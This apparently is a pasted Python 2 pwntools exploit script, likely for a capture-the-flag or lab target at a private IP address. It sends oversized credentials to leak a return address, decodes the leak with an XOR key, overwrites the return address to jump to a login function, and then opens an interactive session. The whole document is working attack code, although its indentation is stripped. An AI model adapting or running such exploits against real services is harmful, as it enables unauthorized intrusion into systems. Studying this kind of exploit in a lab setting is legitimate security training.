Gnzzs2Nn
2017-01-11 18:18:27

from pwn import *


import struct

conn = remote('192.168.56.104',6642)

data = ''

username = ''
password = ''


def xoraddr(addr,val):
result = '0x'+''.join([hex(int("0x"+addr[x:x+2],16) ^ val)[2::] for x in xrange(0,len(addr),2) if x != 0])
return result

val = 0x03

i = 3
while(i > 0):

if i == 3:
username = "A" *32
password = "B" *32
val = 0x03

if i == 2:
username = "A"*20+p32(int(unxored_leak,16))+"A"*8
password = "B"*20+p32(int(unxored_login,16))+"B"*8
if i == 1:
conn.interactive()

print conn.readuntil("Enter your username:")
log.info("Sending %s username",username)
time.sleep(1)
conn.sendline(username)

print conn.readuntil("Enter your password:")
log.info("Sending %s password",password)
conn.sendline(password)
time.sleep(1)

data = conn.readuntil('\n')

if len(data) >=120:
ret = data[116:120]

if i == 3:
log.info("Leaked code section => RET %s:", hex(u32(ret)))
unxored_leak = xoraddr(hex(u32(ret)),val)
log.info("Unxored leak RET: %s",unxored_leak)
unxored_login = xoraddr(hex(int(unxored_leak,16)-1162),val)
log.info("Unxored login addr %s",unxored_login)


i -= 1
conn.close()